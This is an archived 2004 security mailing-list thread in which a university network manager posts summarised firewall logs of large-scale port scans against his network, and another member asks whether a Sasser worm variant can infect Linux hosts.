5 15:30:25 206.13.56.94:1047 -> xxx.yyy.1.4:80 SYN ******S* Jul 5 15:30:25 206.13.56.94:1050 -> xxx.yyy.1.5:80 SYN ******S* Jul 5 15:30:25 206.13.56.94:1053 -> xxx.yyy.1.6:80 SYN ******S* Jul 5 15:30:25 206.13.56.94:1056 -> xxx.yyy.1.7:80 SYN ******S* Jul 5 15:30:25 206.13.56.94:1059 -> xxx.yyy.1.8:80 SYN ******S* [...] 
Jul 5 15:40:22 206.13.56.94:4506 -> xxx.yyy.255.196:80 SYN ******S* Jul 5 15:40:22 206.13.56.94:4511 -> xxx.yyy.255.197:80 SYN ******S* Jul 5 15:40:22 206.13.56.94:4516 -> xxx.yyy.255.198:80 SYN ******S* Jul 5 15:40:22 206.13.56.94:4527 -> xxx.yyy.255.199:80 SYN ******S* Jul 5 15:40:22 206.13.56.94:4534 -> xxx.yyy.255.200:80 SYN ******S* Jul 5 15:40:22 206.13.56.94:4538 -> xxx.yyy.255.201:80 SYN ******S* Jul 5 15:40:22 206.13.56.94:4549 -> xxx.yyy.255.202:80 SYN ******S* Jul 5 15:40:22 206.13.56.94:4563 -> xxx.yyy.255.203:80 SYN ******S* 70532 Jul 5 13:32:14 69.70.36.106:2152 -> xxx.yyy.1.0:1433 SYN ******S* Jul 5 13:32:11 69.70.36.106:2164 -> xxx.yyy.1.1:1433 SYN ******S* Jul 5 13:32:14 69.70.36.106:2176 -> xxx.yyy.1.2:1433 SYN ******S* Jul 5 13:32:11 69.70.36.106:2191 -> xxx.yyy.1.3:1433 SYN ******S* Jul 5 13:32:14 69.70.36.106:2202 -> xxx.yyy.1.4:1433 SYN ******S* Jul 5 13:32:11 69.70.36.106:2212 -> xxx.yyy.1.5:1433 SYN ******S* Jul 5 13:32:14 69.70.36.106:2219 -> xxx.yyy.1.6:1433 SYN ******S* Jul 5 13:32:11 69.70.36.106:2231 -> xxx.yyy.1.7:1433 SYN ******S* [...] 
Jul 5 14:39:26 69.70.36.106:1272 -> xxx.yyy.255.246:1433 SYN ******S* Jul 5 14:39:26 69.70.36.106:1283 -> xxx.yyy.255.247:1433 SYN ******S* Jul 5 14:39:26 69.70.36.106:1294 -> xxx.yyy.255.248:1433 SYN ******S* Jul 5 14:39:26 69.70.36.106:1305 -> xxx.yyy.255.249:1433 SYN ******S* Jul 5 14:39:26 69.70.36.106:1316 -> xxx.yyy.255.250:1433 SYN ******S* Jul 5 14:39:26 69.70.36.106:1327 -> xxx.yyy.255.251:1433 SYN ******S* Jul 5 14:39:26 69.70.36.106:1338 -> xxx.yyy.255.252:1433 SYN ******S* Jul 5 14:39:26 69.70.36.106:1360 -> xxx.yyy.255.254:1433 SYN ******S* 70195 Jul 5 00:00:07 82.33.67.40:1806 -> xxx.yyy.146.238:1433 SYN ******S* Jul 5 00:00:06 82.33.67.40:1898 -> xxx.yyy.147.26:1433 SYN ******S* Jul 5 00:00:06 82.33.67.40:1899 -> xxx.yyy.147.27:1433 SYN ******S* Jul 5 00:00:06 82.33.67.40:1900 -> xxx.yyy.147.28:1433 SYN ******S* Jul 5 00:00:04 82.33.67.40:1852 -> xxx.yyy.147.0:1433 SYN ******S* Jul 5 00:00:06 82.33.67.40:1902 -> xxx.yyy.147.29:1433 SYN ******S* Jul 5 00:00:06 82.33.67.40:1903 -> xxx.yyy.147.30:1433 SYN ******S* Jul 5 00:00:06 82.33.67.40:1904 -> xxx.yyy.147.31:1433 SYN ******S* [...] 
Jul 5 01:38:13 82.33.67.40:3175 -> xxx.yyy.255.244:1433 SYN ******S* Jul 5 01:38:13 82.33.67.40:3180 -> xxx.yyy.255.245:1433 SYN ******S* Jul 5 01:38:13 82.33.67.40:3183 -> xxx.yyy.255.247:1433 SYN ******S* Jul 5 01:38:13 82.33.67.40:3182 -> xxx.yyy.255.246:1433 SYN ******S* Jul 5 01:38:13 82.33.67.40:3184 -> xxx.yyy.255.248:1433 SYN ******S* Jul 5 01:38:13 82.33.67.40:3186 -> xxx.yyy.255.249:1433 SYN ******S* Jul 5 01:38:13 82.33.67.40:3192 -> xxx.yyy.255.252:1433 SYN ******S* Jul 5 01:38:14 82.33.67.40:3196 -> xxx.yyy.255.253:1433 SYN ******S* Jul 5 01:38:14 82.33.67.40:3197 -> xxx.yyy.255.254:1433 SYN ******S* 65830 Jul 5 18:16:39 66.131.77.88:22002 -> xxx.yyy.1.0:3127 SYN ******S* Jul 5 18:16:39 66.131.77.88:22002 -> xxx.yyy.1.0:1080 SYN ******S* Jul 5 18:16:39 66.131.77.88:22002 -> xxx.yyy.1.0:10080 SYN ******S* Jul 5 18:16:40 66.131.77.88:22002 -> xxx.yyy.1.0:3128 SYN ******S* Jul 5 18:16:40 66.131.77.88:22002 -> xxx.yyy.1.1:3127 SYN ******S* Jul 5 18:16:40 66.131.77.88:22002 -> xxx.yyy.1.1:1080 SYN ******S* Jul 5 18:16:40 66.131.77.88:22002 -> xxx.yyy.1.1:10080 SYN ******S* Jul 5 18:16:40 66.131.77.88:22002 -> xxx.yyy.1.1:3128 SYN ******S* [...] 
Jul 5 21:00:47 66.131.77.88:22002 -> xxx.yyy.95.253:3128 SYN ******S* Jul 5 21:00:47 66.131.77.88:22002 -> xxx.yyy.95.254:3127 SYN ******S* Jul 5 21:00:47 66.131.77.88:22002 -> xxx.yyy.95.254:1080 SYN ******S* Jul 5 21:00:47 66.131.77.88:22002 -> xxx.yyy.95.254:10080 SYN ******S* Jul 5 21:00:47 66.131.77.88:22002 -> xxx.yyy.95.254:3128 SYN ******S* Jul 5 21:00:48 66.131.77.88:22002 -> xxx.yyy.95.255:3127 SYN ******S* Jul 5 21:00:48 66.131.77.88:22002 -> xxx.yyy.95.255:1080 SYN ******S* Jul 5 21:00:48 66.131.77.88:22002 -> xxx.yyy.95.255:10080 SYN ******S* Jul 5 21:00:48 66.131.77.88:22002 -> xxx.yyy.95.255:3128 SYN ******S* 62375 Jul 5 22:08:24 213.180.193.68:54118 -> xxx.yyy.1.41:1080 SYN ******S* Jul 5 22:08:24 213.180.193.68:59475 -> xxx.yyy.1.41:1180 SYN ******S* Jul 5 22:08:24 213.180.193.68:61599 -> xxx.yyy.1.41:1075 SYN ******S* Jul 5 22:08:24 213.180.193.68:35219 -> xxx.yyy.1.41:80 SYN ******S* Jul 5 22:08:24 213.180.193.68:44532 -> xxx.yyy.1.41:3128 SYN ******S* Jul 5 22:08:24 213.180.193.68:35402 -> xxx.yyy.1.41:8000 SYN ******S* Jul 5 22:08:24 213.180.193.68:54710 -> xxx.yyy.1.41:4480 SYN ******S* Jul 5 22:08:24 213.180.193.68:60276 -> xxx.yyy.1.41:8080 SYN ******S* [...] 
Jul 5 23:47:53 213.180.193.68:55561 -> xxx.yyy.1.41:2370 SYN ******S* Jul 5 23:47:53 213.180.193.68:41794 -> xxx.yyy.1.41:2372 SYN ******S* Jul 5 23:47:53 213.180.193.68:44819 -> xxx.yyy.1.41:2373 SYN ******S* Jul 5 23:47:53 213.180.193.68:56281 -> xxx.yyy.1.41:2374 SYN ******S* Jul 5 23:47:53 213.180.193.68:52951 -> xxx.yyy.1.41:2375 SYN ******S* Jul 5 23:47:53 213.180.193.68:53013 -> xxx.yyy.1.41:2376 SYN ******S* Jul 5 23:47:53 213.180.193.68:34779 -> xxx.yyy.1.41:2377 SYN ******S* Jul 5 23:47:53 213.180.193.68:62839 -> xxx.yyy.1.41:2379 SYN ******S* Jul 5 23:47:53 213.180.193.68:60225 -> xxx.yyy.1.41:7633 SYN ******S* 57997 Jul 5 13:43:38 216.65.39.38:39645 -> xxx.yyy.1.2:32773 SYN ******S* Jul 5 13:43:38 216.65.39.38:39646 -> xxx.yyy.1.3:32773 SYN ******S* Jul 5 13:43:41 216.65.39.38:39647 -> xxx.yyy.1.4:32773 SYN ******S* Jul 5 13:43:38 216.65.39.38:39643 -> xxx.yyy.1.0:32773 SYN ******S* Jul 5 13:43:38 216.65.39.38:39644 -> xxx.yyy.1.1:32773 SYN ******S* Jul 5 13:43:41 216.65.39.38:39650 -> xxx.yyy.1.7:32773 SYN ******S* Jul 5 13:43:41 216.65.39.38:39648 -> xxx.yyy.1.5:32773 SYN ******S* Jul 5 13:43:41 216.65.39.38:39649 -> xxx.yyy.1.6:32773 SYN ******S* [...] 
Jul 5 13:52:45 216.65.39.38:47642 -> xxx.yyy.255.250:32773 SYN ******S* Jul 5 13:52:45 216.65.39.38:47644 -> xxx.yyy.255.252:32773 SYN ******S* Jul 5 13:52:45 216.65.39.38:47641 -> xxx.yyy.255.249:32773 SYN ******S* Jul 5 13:52:45 216.65.39.38:47643 -> xxx.yyy.255.251:32773 SYN ******S* Jul 5 13:52:45 216.65.39.38:47645 -> xxx.yyy.255.253:32773 SYN ******S* Jul 5 13:52:45 216.65.39.38:47639 -> xxx.yyy.255.247:32773 SYN ******S* Jul 5 13:52:45 216.65.39.38:47640 -> xxx.yyy.255.248:32773 SYN ******S* Jul 5 13:52:45 216.65.39.38:47646 -> xxx.yyy.255.254:32773 SYN ******S* 57467 Jul 5 00:01:44 218.107.144.98:2106 -> xxx.yyy.128.0:901 SYN ******S* Jul 5 00:01:49 218.107.144.98:2166 -> xxx.yyy.128.2:901 SYN ******S* Jul 5 00:01:47 218.107.144.98:2165 -> xxx.yyy.128.1:901 SYN ******S* Jul 5 00:01:49 218.107.144.98:2167 -> xxx.yyy.128.3:901 SYN ******S* Jul 5 00:01:49 218.107.144.98:2194 -> xxx.yyy.128.4:901 SYN ******S* Jul 5 00:01:49 218.107.144.98:2195 -> xxx.yyy.128.5:901 SYN ******S* Jul 5 00:01:49 218.107.144.98:2196 -> xxx.yyy.128.6:901 SYN ******S* Jul 5 00:01:49 218.107.144.98:2197 -> xxx.yyy.128.7:901 SYN ******S* [...] 
Jul 5 00:57:43 218.107.144.98:3820 -> xxx.yyy.254.236:901 SYN ******S*
Jul 5 00:57:43 218.107.144.98:3833 -> xxx.yyy.254.249:901 SYN ******S*
Jul 5 00:57:43 218.107.144.98:3830 -> xxx.yyy.254.246:901 SYN ******S*
Jul 5 00:57:43 218.107.144.98:3827 -> xxx.yyy.254.243:901 SYN ******S*
Jul 5 00:57:43 218.107.144.98:3824 -> xxx.yyy.254.240:901 SYN ******S*
Jul 5 00:57:43 218.107.144.98:3821 -> xxx.yyy.254.237:901 SYN ******S*
Jul 5 00:57:43 218.107.144.98:3837 -> xxx.yyy.254.253:901 SYN ******S*
Jul 5 00:57:43 218.107.144.98:3834 -> xxx.yyy.254.250:901 SYN ******S*
Jul 5 00:57:43 218.107.144.98:3831 -> xxx.yyy.254.247:901 SYN ******S*
54317

Jul 5 10:03:49 198.69.219.175:2392 -> xxx.yyy.1.1:6129 SYN ******S*
Jul 5 10:03:52 198.69.219.175:2396 -> xxx.yyy.1.5:6129 SYN ******S*
Jul 5 10:03:52 198.69.219.175:2398 -> xxx.yyy.1.7:6129 SYN ******S*
Jul 5 10:03:52 198.69.219.175:2399 -> xxx.yyy.1.8:6129 SYN ******S*
Jul 5 10:03:52 198.69.219.175:2401 -> xxx.yyy.1.10:6129 SYN ******S*
Jul 5 10:03:49 198.69.219.175:2402 -> xxx.yyy.1.11:6129 SYN ******S*
Jul 5 10:03:52 198.69.219.175:2406 -> xxx.yyy.1.15:6129 SYN ******S*
Jul 5 10:03:49 198.69.219.175:2407 -> xxx.yyy.1.16:6129 SYN ******S*
[...]
Jul 5 10:14:27 198.69.219.175:2078 -> xxx.yyy.255.197:6129 SYN ******S*
Jul 5 10:14:27 198.69.219.175:2110 -> xxx.yyy.255.229:6129 SYN ******S*
Jul 5 10:14:27 198.69.219.175:2126 -> xxx.yyy.255.245:6129 SYN ******S*
Jul 5 10:14:27 198.69.219.175:2059 -> xxx.yyy.255.178:6129 SYN ******S*
Jul 5 10:14:27 198.69.219.175:2107 -> xxx.yyy.255.226:6129 SYN ******S*
Jul 5 10:14:27 198.69.219.175:2123 -> xxx.yyy.255.242:6129 SYN ******S*
Jul 5 10:14:27 198.69.219.175:2120 -> xxx.yyy.255.239:6129 SYN ******S*
Jul 5 10:14:27 198.69.219.175:2104 -> xxx.yyy.255.223:6129 SYN ******S*
42531

Jul 5 14:48:46 218.148.76.176:3714 -> xxx.yyy.1.0:21 SYN ******S*
Jul 5 14:48:46 218.148.76.176:3716 -> xxx.yyy.1.2:21 SYN ******S*
Jul 5 14:48:46 218.148.76.176:3717 -> xxx.yyy.1.3:21 SYN ******S*
Jul 5 14:48:46 218.148.76.176:3719 -> xxx.yyy.1.4:21 SYN ******S*
Jul 5 14:48:46 218.148.76.176:3720 -> xxx.yyy.1.5:21 SYN ******S*
Jul 5 14:48:46 218.148.76.176:3721 -> xxx.yyy.1.6:21 SYN ******S*
Jul 5 14:48:46 218.148.76.176:3722 -> xxx.yyy.1.7:21 SYN ******S*
Jul 5 14:48:46 218.148.76.176:3723 -> xxx.yyy.1.8:21 SYN ******S*
[...]
Jul 5 14:59:44 218.148.76.176:1624 -> xxx.yyy.255.252:21 SYN ******S*
Jul 5 14:59:44 218.148.76.176:1612 -> xxx.yyy.255.240:21 SYN ******S*
Jul 5 14:59:44 218.148.76.176:1627 -> xxx.yyy.255.255:21 SYN ******S*
Jul 5 14:59:44 218.148.76.176:1617 -> xxx.yyy.255.245:21 SYN ******S*
Jul 5 14:59:44 218.148.76.176:1620 -> xxx.yyy.255.248:21 SYN ******S*
Jul 5 14:59:44 218.148.76.176:1622 -> xxx.yyy.255.250:21 SYN ******S*
Jul 5 14:59:44 218.148.76.176:1625 -> xxx.yyy.255.253:21 SYN ******S*
Jul 5 14:59:44 218.148.76.176:1626 -> xxx.yyy.255.254:21 SYN ******S*
40557

Jul 5 23:49:10 64.30.172.24:1697 -> xxx.yyy.1.1:715 SYN ******S*
Jul 5 23:49:10 64.30.172.24:1698 -> xxx.yyy.1.2:715 SYN ******S*
Jul 5 23:49:10 64.30.172.24:1699 -> xxx.yyy.1.3:715 SYN ******S*
Jul 5 23:49:12 64.30.172.24:1700 -> xxx.yyy.1.4:715 SYN ******S*
Jul 5 23:49:13 64.30.172.24:1701 -> xxx.yyy.1.5:715 SYN ******S*
Jul 5 23:49:13 64.30.172.24:1702 -> xxx.yyy.1.6:715 SYN ******S*
Jul 5 23:49:13 64.30.172.24:1704 -> xxx.yyy.1.7:715 SYN ******S*
Jul 5 23:49:13 64.30.172.24:1705 -> xxx.yyy.1.8:715 SYN ******S*
[...]
Jul 6 00:00:00 64.30.172.24:4052 -> xxx.yyy.151.208:715 SYN ******S*
Jul 6 00:00:00 64.30.172.24:4053 -> xxx.yyy.151.209:715 SYN ******S*
Jul 6 00:00:00 64.30.172.24:4054 -> xxx.yyy.151.210:715 SYN ******S*
Jul 6 00:00:00 64.30.172.24:4056 -> xxx.yyy.151.211:715 SYN ******S*
Jul 6 00:00:00 64.30.172.24:4057 -> xxx.yyy.151.212:715 SYN ******S*
Jul 6 00:00:00 64.30.172.24:4058 -> xxx.yyy.151.213:715 SYN ******S*
Jul 6 00:00:00 64.30.172.24:4059 -> xxx.yyy.151.214:715 SYN ******S*
Jul 6 00:00:00 64.30.172.24:4060 -> xxx.yyy.151.215:715 SYN ******S*
Jul 6 00:00:01 64.30.172.24:4062 -> xxx.yyy.151.216:715 SYN ******S*
31424

Jul 5 15:36:05 203.70.58.114:41557 -> xxx.yyy.1.0:6112 SYN ******S*
Jul 5 15:36:05 203.70.58.114:41558 -> xxx.yyy.1.1:6112 SYN ******S*
Jul 5 15:36:05 203.70.58.114:41559 -> xxx.yyy.1.2:6112 SYN ******S*
Jul 5 15:36:05 203.70.58.114:41560 -> xxx.yyy.1.3:6112 SYN ******S*
Jul 5 15:36:05 203.70.58.114:41561 -> xxx.yyy.1.4:6112 SYN ******S*
Jul 5 15:36:05 203.70.58.114:41562 -> xxx.yyy.1.5:6112 SYN ******S*
Jul 5 15:36:05 203.70.58.114:41563 -> xxx.yyy.1.6:6112 SYN ******S*
Jul 5 15:36:05 203.70.58.114:41564 -> xxx.yyy.1.7:6112 SYN ******S*
[...]
Jul 5 15:39:19 203.70.58.114:57645 -> xxx.yyy.255.246:6112 SYN ******S*
Jul 5 15:39:19 203.70.58.114:57647 -> xxx.yyy.255.248:6112 SYN ******S*
Jul 5 15:39:19 203.70.58.114:57648 -> xxx.yyy.255.249:6112 SYN ******S*
Jul 5 15:39:19 203.70.58.114:57649 -> xxx.yyy.255.250:6112 SYN ******S*
Jul 5 15:39:19 203.70.58.114:57650 -> xxx.yyy.255.251:6112 SYN ******S*
Jul 5 15:39:19 203.70.58.114:57651 -> xxx.yyy.255.252:6112 SYN ******S*
Jul 5 15:39:19 203.70.58.114:57652 -> xxx.yyy.255.253:6112 SYN ******S*
Jul 5 15:39:19 203.70.58.114:57653 -> xxx.yyy.255.254:6112 SYN ******S*
30230

Jul 5 06:01:23 24.37.175.52:58646 -> xxx.yyy.1.11:2401 SYN ******S*
Jul 5 06:01:23 24.37.175.52:58647 -> xxx.yyy.1.12:2401 SYN ******S*
Jul 5 06:01:23 24.37.175.52:58648 -> xxx.yyy.1.13:2401 SYN ******S*
Jul 5 06:01:20 24.37.175.52:58651 -> xxx.yyy.1.16:2401 SYN ******S*
Jul 5 06:01:20 24.37.175.52:58652 -> xxx.yyy.1.17:2401 SYN ******S*
Jul 5 06:01:23 24.37.175.52:58649 -> xxx.yyy.1.14:2401 SYN ******S*
Jul 5 06:01:23 24.37.175.52:58650 -> xxx.yyy.1.15:2401 SYN ******S*
Jul 5 06:01:23 24.37.175.52:58653 -> xxx.yyy.1.18:2401 SYN ******S*
[...]
Jul 5 06:15:44 24.37.175.52:38804 -> xxx.yyy.255.48:2401 SYN ******S*
Jul 5 06:15:44 24.37.175.52:38805 -> xxx.yyy.255.49:2401 SYN ******S*
Jul 5 06:15:44 24.37.175.52:38808 -> xxx.yyy.255.52:2401 SYN ******S*
Jul 5 06:15:44 24.37.175.52:38807 -> xxx.yyy.255.51:2401 SYN ******S*
Jul 5 06:15:44 24.37.175.52:38806 -> xxx.yyy.255.50:2401 SYN ******S*
Jul 5 06:15:44 24.37.175.52:38810 -> xxx.yyy.255.54:2401 SYN ******S*
Jul 5 06:15:44 24.37.175.52:38811 -> xxx.yyy.255.55:2401 SYN ******S*
Jul 5 06:15:44 24.37.175.52:38809 -> xxx.yyy.255.53:2401 SYN ******S*
Jul 5 06:15:44 24.37.175.52:38812 -> xxx.yyy.255.56:2401 SYN ******S*
21788

Jul 5 07:54:57 66.201.243.156:111 -> xxx.yyy.1.2:111 SYN ******S*
Jul 5 07:54:57 66.201.243.156:111 -> xxx.yyy.1.4:111 SYN ******S*
Jul 5 07:54:57 66.201.243.156:111 -> xxx.yyy.1.3:111 SYN ******S*
Jul 5 07:54:57 66.201.243.156:111 -> xxx.yyy.1.5:111 SYN ******S*
Jul 5 07:54:57 66.201.243.156:111 -> xxx.yyy.1.7:111 SYN ******S*
Jul 5 07:54:57 66.201.243.156:111 -> xxx.yyy.1.10:111 SYN ******S*
Jul 5 07:54:57 66.201.243.156:111 -> xxx.yyy.1.8:111 SYN ******S*
Jul 5 07:54:57 66.201.243.156:111 -> xxx.yyy.1.9:111 SYN ******S*
[...]
Jul 5 07:55:12 66.201.243.156:111 -> xxx.yyy.255.231:111 SYN ******S*
Jul 5 07:55:12 66.201.243.156:111 -> xxx.yyy.255.232:111 SYN ******S*
Jul 5 07:55:12 66.201.243.156:111 -> xxx.yyy.255.234:111 SYN ******S*
Jul 5 07:55:12 66.201.243.156:111 -> xxx.yyy.255.236:111 SYN ******S*
Jul 5 07:55:12 66.201.243.156:111 -> xxx.yyy.255.238:111 SYN ******S*
Jul 5 07:55:12 66.201.243.156:111 -> xxx.yyy.255.239:111 SYN ******S*
Jul 5 07:55:12 66.201.243.156:111 -> xxx.yyy.255.240:111 SYN ******S*
Jul 5 07:55:12 66.201.243.156:111 -> xxx.yyy.255.244:111 SYN ******S*
16588

Jul 5 01:00:26 221.192.38.124:1433 -> xxx.yyy.153.139:5554 SYN ******S*
Jul 5 01:00:27 221.192.38.124:1805 -> xxx.yyy.153.139:1023 SYN ******S*
Jul 5 01:00:29 221.192.38.124:2737 -> xxx.yyy.153.139:9898 SYN ******S*
Jul 5 01:00:26 221.192.38.124:1432 -> xxx.yyy.153.138:5554 SYN ******S*
Jul 5 01:00:27 221.192.38.124:1816 -> xxx.yyy.153.138:1023 SYN ******S*
Jul 5 01:00:29 221.192.38.124:2734 -> xxx.yyy.153.138:9898 SYN ******S*
Jul 5 01:00:26 221.192.38.124:1435 -> xxx.yyy.153.141:5554 SYN ******S*
Jul 5 01:00:27 221.192.38.124:1817 -> xxx.yyy.153.141:1023 SYN ******S*
[...]
Jul 5 01:01:19 221.192.38.124:2164 -> xxx.yyy.173.245:9898 SYN ******S*
Jul 5 01:01:19 221.192.38.124:2158 -> xxx.yyy.173.253:9898 SYN ******S*
Jul 5 01:01:19 221.192.38.124:2167 -> xxx.yyy.174.0:9898 SYN ******S*
Jul 5 01:01:19 221.192.38.124:2169 -> xxx.yyy.174.2:9898 SYN ******S*
Jul 5 01:01:19 221.192.38.124:2165 -> xxx.yyy.173.246:9898 SYN ******S*
Jul 5 01:01:19 221.192.38.124:2168 -> xxx.yyy.174.1:9898 SYN ******S*
Jul 5 01:01:19 221.192.38.124:2170 -> xxx.yyy.173.254:9898 SYN ******S*
Jul 5 01:01:19 221.192.38.124:2182 -> xxx.yyy.173.255:9898 SYN ******S*
15209

Jul 5 23:56:34 220.121.93.200:2472 -> xxx.yyy.215.210:5554 SYN ******S*
Jul 5 23:56:35 220.121.93.200:2973 -> xxx.yyy.215.210:1023 SYN ******S*
Jul 5 23:56:37 220.121.93.200:4382 -> xxx.yyy.215.210:9898 SYN ******S*
Jul 5 23:56:34 220.121.93.200:2473 -> xxx.yyy.215.211:5554 SYN ******S*
Jul 5 23:56:35 220.121.93.200:2975 -> xxx.yyy.215.211:1023 SYN ******S*
Jul 5 23:56:37 220.121.93.200:4402 -> xxx.yyy.215.211:9898 SYN ******S*
Jul 5 23:56:34 220.121.93.200:2475 -> xxx.yyy.215.212:5554 SYN ******S*
Jul 5 23:56:35 220.121.93.200:2976 -> xxx.yyy.215.212:1023 SYN ******S*
[...]
Jul 5 23:57:19 220.121.93.200:3771 -> xxx.yyy.236.62:9898 SYN ******S*
Jul 5 23:57:19 220.121.93.200:3776 -> xxx.yyy.236.66:9898 SYN ******S*
Jul 5 23:57:19 220.121.93.200:3777 -> xxx.yyy.236.67:9898 SYN ******S*
Jul 5 23:57:19 220.121.93.200:3779 -> xxx.yyy.236.68:9898 SYN ******S*
Jul 5 23:57:19 220.121.93.200:3782 -> xxx.yyy.236.70:9898 SYN ******S*
Jul 5 23:57:19 220.121.93.200:3795 -> xxx.yyy.236.73:9898 SYN ******S*
Jul 5 23:57:19 220.121.93.200:3797 -> xxx.yyy.236.75:9898 SYN ******S*
Jul 5 23:57:19 220.121.93.200:3794 -> xxx.yyy.236.72:9898 SYN ******S*
Jul 5 23:57:19 220.121.93.200:3798 -> xxx.yyy.236.76:9898 SYN ******S*
15128

Jul 5 00:55:02 221.201.83.59:2448 -> xxx.yyy.71.160:5554 SYN ******S*
Jul 5 00:55:02 221.201.83.59:3095 -> xxx.yyy.71.160:1023 SYN ******S*
Jul 5 00:55:04 221.201.83.59:4547 -> xxx.yyy.71.160:9898 SYN ******S*
Jul 5 00:55:02 221.201.83.59:2453 -> xxx.yyy.71.161:5554 SYN ******S*
Jul 5 00:55:02 221.201.83.59:3096 -> xxx.yyy.71.161:1023 SYN ******S*
Jul 5 00:55:04 221.201.83.59:4548 -> xxx.yyy.71.161:9898 SYN ******S*
Jul 5 00:55:02 221.201.83.59:2456 -> xxx.yyy.71.164:5554 SYN ******S*
Jul 5 00:55:02 221.201.83.59:3101 -> xxx.yyy.71.164:1023 SYN ******S*
[...]
Jul 5 00:55:44 221.201.83.59:1573 -> xxx.yyy.91.247:9898 SYN ******S*
Jul 5 00:55:44 221.201.83.59:1574 -> xxx.yyy.91.248:9898 SYN ******S*
Jul 5 00:55:44 221.201.83.59:1592 -> xxx.yyy.91.246:9898 SYN ******S*
Jul 5 00:55:44 221.201.83.59:1594 -> xxx.yyy.91.249:9898 SYN ******S*
Jul 5 00:55:44 221.201.83.59:1626 -> xxx.yyy.91.250:9898 SYN ******S*
Jul 5 00:55:44 221.201.83.59:1627 -> xxx.yyy.91.251:9898 SYN ******S*
Jul 5 00:55:44 221.201.83.59:1628 -> xxx.yyy.91.252:9898 SYN ******S*
Jul 5 00:55:44 221.201.83.59:1639 -> xxx.yyy.91.253:9898 SYN ******S*
14808

Jul 5 00:56:17 61.49.148.84:2569 -> xxx.yyy.235.115:5554 SYN ******S*
Jul 5 00:56:18 61.49.148.84:2969 -> xxx.yyy.235.115:1023 SYN ******S*
Jul 5 00:56:17 61.49.148.84:2570 -> xxx.yyy.235.116:5554 SYN ******S*
Jul 5 00:56:18 61.49.148.84:2970 -> xxx.yyy.235.116:1023 SYN ******S*
Jul 5 00:56:17 61.49.148.84:2572 -> xxx.yyy.235.117:5554 SYN ******S*
Jul 5 00:56:18 61.49.148.84:2973 -> xxx.yyy.235.117:1023 SYN ******S*
Jul 5 00:56:17 61.49.148.84:2577 -> xxx.yyy.235.118:5554 SYN ******S*
Jul 5 00:56:18 61.49.148.84:2985 -> xxx.yyy.235.118:1023 SYN ******S*
[...]
Jul 5 00:57:46 61.49.148.84:2191 -> xxx.yyy.255.128:9898 SYN ******S*
Jul 5 00:57:46 61.49.148.84:2214 -> xxx.yyy.255.141:9898 SYN ******S*
Jul 5 00:57:46 61.49.148.84:2217 -> xxx.yyy.255.143:9898 SYN ******S*
Jul 5 00:57:46 61.49.148.84:2215 -> xxx.yyy.255.142:9898 SYN ******S*
Jul 5 00:57:47 61.49.148.84:2224 -> xxx.yyy.255.139:9898 SYN ******S*
Jul 5 00:57:47 61.49.148.84:2226 -> xxx.yyy.255.140:9898 SYN ******S*
Jul 5 00:57:47 61.49.148.84:2228 -> xxx.yyy.255.137:9898 SYN ******S*
Jul 5 00:57:47 61.49.148.84:2229 -> xxx.yyy.255.138:9898 SYN ******S*
13045

Jul 5 00:56:04 61.55.25.234:1523 -> xxx.yyy.133.16:5554 SYN ******S*
Jul 5 00:56:07 61.55.25.234:3419 -> xxx.yyy.133.16:9898 SYN ******S*
Jul 5 00:56:04 61.55.25.234:1522 -> xxx.yyy.133.19:5554 SYN ******S*
Jul 5 00:56:07 61.55.25.234:3439 -> xxx.yyy.133.19:9898 SYN ******S*
Jul 5 00:56:04 61.55.25.234:1524 -> xxx.yyy.133.17:5554 SYN ******S*
Jul 5 00:56:07 61.55.25.234:3420 -> xxx.yyy.133.17:9898 SYN ******S*
Jul 5 00:56:04 61.55.25.234:1630 -> xxx.yyy.133.22:5554 SYN ******S*
Jul 5 00:56:05 61.55.25.234:2324 -> xxx.yyy.133.22:1023 SYN ******S*
[...]
Jul 5 00:56:46 61.55.25.234:3011 -> xxx.yyy.153.4:9898 SYN ******S*
Jul 5 00:56:46 61.55.25.234:3012 -> xxx.yyy.153.5:9898 SYN ******S*
Jul 5 00:56:46 61.55.25.234:3027 -> xxx.yyy.153.10:9898 SYN ******S*
Jul 5 00:56:46 61.55.25.234:3028 -> xxx.yyy.153.11:9898 SYN ******S*
Jul 5 00:56:46 61.55.25.234:3022 -> xxx.yyy.153.6:9898 SYN ******S*
Jul 5 00:56:46 61.55.25.234:3024 -> xxx.yyy.153.7:9898 SYN ******S*
Jul 5 00:56:46 61.55.25.234:3025 -> xxx.yyy.153.8:9898 SYN ******S*
Jul 5 00:56:46 61.55.25.234:3236 -> xxx.yyy.153.55:9898 SYN ******S*
Jul 5 00:56:46 61.55.25.234:3240 -> xxx.yyy.153.59:9898 SYN ******S*
12526

-- 
- Ken
===========================================================================
Ken Connelly (KC152)  Systems and Operations Manager, ITS - Network Services
University of Northern Iowa  Cedar Falls, IA 50614-0121
email: Ken.Connelly at uni.edu  phone: (319) 273-5850  fax: (319) 273-7373

From sean at coldstream.ca Tue Jul 6 20:59:04 2004
From: sean at coldstream.ca (Sean Rooney)
Date: Tue, 6 Jul 2004 16:59:04 -0400
Subject: [Intrusions] question re: sasser variants? [linux crossover?]
Message-ID: <50882476-CF8F-11D8-B1AD-000D93510DB8@coldstream.ca>

We are seeing what looks like a Sasser worm (exploits port 445 netbios defects on Windows to set up shop and reproduce), but some of the origins are actually Linux boxes. Are you aware of a variant that performs some other attack to lodge on Linux systems?

I'm afraid I can't give you much more information than that for the time being. I'm attempting to capture live data [ethereal] and a live sample of this worm if able, and will supply follow-up technical analysis at an appropriate time. [I like things you can measure and quantify in precise terms.] The potential impact of this type of crossover is still being evaluated, and we invite commentary.

Cheers
-sr
-------------------------------------------------------------
Sean Rooney, CTO  ColdStream Associates Ltd.
PGP fingerprint: C32C 88A0 86A8 2BBE 2911 D855 1CE1 1679 6B52 405C
"Illos laetae devorunt, qui nos subicient."
TigerTeaming Whitepaper: http://www.coldstream.ca/resources/tigerteams.pdf
Ask about our spring special for packaged IT-Security Testing.

From Ken.Connelly at uni.edu Wed Jul 7 11:24:48 2004
From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu)
Date: Wed, 07 Jul 2004 06:24:48 -0500 (CDT)
Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects
Message-ID: <01LC64VNXSFO8YBZ2Y@uni.edu>

The following extracts show the beginning and ending of scan activity that was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500.

Jul 6 01:42:12 209.135.97.164:2418 -> xxx.yyy.1.1:554 SYN ******S*
Jul 6 01:42:12 209.135.97.164:2419 -> xxx.yyy.1.2:554 SYN ******S*
